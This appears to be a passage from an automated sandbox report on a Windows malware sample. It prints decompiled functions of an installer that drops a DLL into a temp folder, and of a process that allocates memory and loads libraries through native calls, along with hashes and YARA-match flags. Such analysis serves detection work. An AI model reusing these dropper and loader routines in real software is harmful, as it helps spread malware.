							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





                                                                    0x00404cad
                                                                    0x00404cca
                                                                    0x00404cce
                                                                    0x00404cd0
                                                                    0x00404cd0
                                                                    0x00404cd0
                                                                    0x00404cd7
                                                                    0x00404ce3
                                                                    0x00404d03
                                                                    0x00000000
                                                                    0x00404ce5
                                                                    0x00404ce8
                                                                    0x00404cee
                                                                    0x00404cf0
                                                                    0x00404d43
                                                                    0x00404d43
                                                                    0x00404d46
                                                                    0x00000000
                                                                    0x00404d56
                                                                    0x00404cfc
                                                                    0x00404cfe
                                                                    0x00404d06
                                                                    0x00404d06
                                                                    0x00404d09
                                                                    0x00404d0b
                                                                    0x00404d11
                                                                    0x00404d20
                                                                    0x00404d26
                                                                    0x00404d2d
                                                                    0x00404d34
                                                                    0x00404d3b
                                                                    0x00404d40
                                                                    0x00404d11
                                                                    0x00000000
                                                                    0x00404d09
                                                                    0x00404ce3
                                                                    0x00404cb3
                                                                    0x00404cbe
                                                                    0x00000000
                                                                    0x00404cc3
                                                                    0x00000000

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 00404CE8
                                                                    • CallWindowProcA.USER32 ref: 00404D56
                                                                      • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                    • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                    • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                    • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                    0x0040253c
                                                                    0x0040253c
                                                                    0x0040253f
                                                                    0x0040255a
                                                                    0x00402541
                                                                    0x00402543
                                                                    0x00402548
                                                                    0x0040254f
                                                                    0x00402561
                                                                    0x004026da
                                                                    0x004026da
                                                                    0x00402567
                                                                    0x00402579
                                                                    0x004015c8
                                                                    0x004015ca
                                                                    0x00000000
                                                                    0x004015d0
                                                                    0x004015ca
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll, xrefs: 00402548, 0040256D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWritelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                    • API String ID: 427699356-1736446979
                                                                    • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                    • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                    • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                    • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                                    0x00405514
                                                                    0x0040551e
                                                                    0x00405520
                                                                    0x00405527
                                                                    0x0040552f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040552f
                                                                    0x00405531
                                                                    0x00405535

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-1669384263
                                                                    • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                    • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                    • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                    • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                    0x00405630
                                                                    0x00405632
                                                                    0x0040565a
                                                                    0x0040563f
                                                                    0x00405644
                                                                    0x0040564f
                                                                    0x00000000
                                                                    0x0040566c
                                                                    0x00405658
                                                                    0x00405658
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                    • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                    • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                    • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: AQJEKNHnWK.exe PID: 4772 Parent PID: 1724 AQJEKNHnWK.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                    0x00418273
                                                                    0x0041827f
                                                                    0x00418287
                                                                    0x00418292
                                                                    0x004182ad
                                                                    0x004182b5
                                                                    0x004182b9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: R=A$R=A
                                                                    • API String ID: 2738559852-3742021989
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00409B20(intOrPtr* __eax, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t16;
				struct _OBJDIR_INFORMATION _t18;
				struct _OBJDIR_INFORMATION _t19;
				void* _t31;
				void* _t32;
				void* _t33;

				asm("in al, dx");
				asm("adc al, 0x2");
				 *__eax =  *__eax + __eax;
				_v8 =  &_v536;
				_t16 = E0041AB50( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t16 != 0) {
					_t18 = E0041AF70(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t18;
					if(_t18 != 0) {
						E0041B1F0( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t19 = E00419300(_v8);
					_v16 = _t19;
					__eflags = _t19;
					if(_t19 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t19;
				} else {
					return _t16;
				}
			}













                                                                    0x00409b24
                                                                    0x00409b25
                                                                    0x00409b27
                                                                    0x00409b3c
                                                                    0x00409b3f
                                                                    0x00409b44
                                                                    0x00409b49
                                                                    0x00409b53
                                                                    0x00409b58
                                                                    0x00409b5b
                                                                    0x00409b5d
                                                                    0x00409b65
                                                                    0x00409b6a
                                                                    0x00409b6a
                                                                    0x00409b71
                                                                    0x00409b79
                                                                    0x00409b7c
                                                                    0x00409b7e
                                                                    0x00409b92
                                                                    0x00000000
                                                                    0x00409b94
                                                                    0x00409b9a
                                                                    0x00409b4e
                                                                    0x00409b4e
                                                                    0x00409b4e

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                    0x004181cf
                                                                    0x004181d7
                                                                    0x0041820d
                                                                    0x00418211

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004182EA(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {

				if (__eflags == 0) goto L3;
			}



                                                                    0x004182ef

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aebc0364f7a1fe722b3103ab9ebd013d8ea20f2e03b34a8a163d61af5f5e604d
                                                                    • Instruction ID: 8dd77e632df81bcd570f584c9ff0c48b05ca32dd761f5e34c5f7ba5d9da0ef1a
                                                                    • Opcode Fuzzy Hash: aebc0364f7a1fe722b3103ab9ebd013d8ea20f2e03b34a8a163d61af5f5e604d
                                                                    • Instruction Fuzzy Hash: B2F058B6200214ABD714EFD8DC84EEB73A9EF88310F14855DFA189B242CA31E9508BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E0041839A(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("adc al, 0xf5");
				asm("sbb [edx-0x74aac316], dl");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                    0x0041839a
                                                                    0x0041839c
                                                                    0x004183a3
                                                                    0x004183af
                                                                    0x004183b7
                                                                    0x004183d9
                                                                    0x004183dd

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 0ae6e5bbc1a4a952d714f61fa835133b25ea84b074d26d58f092658810e88300
                                                                    • Instruction ID: beddd9216e51c0e12b61a25c6151ebdac1dbbda287d4ca788872676b392c38e0
                                                                    • Opcode Fuzzy Hash: 0ae6e5bbc1a4a952d714f61fa835133b25ea84b074d26d58f092658810e88300
                                                                    • Instruction Fuzzy Hash: 2CF08CB6200208AFDB14CF99DC80EEB77A8EF8C350F01824DFA0897241C630E911CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                    0x004183af
                                                                    0x004183b7
                                                                    0x004183d9
                                                                    0x004183dd

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                    • Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
                                                                    • Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                    • Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                    • Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
                                                                    • Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                    • Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                    • Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
                                                                    • Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                    • Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
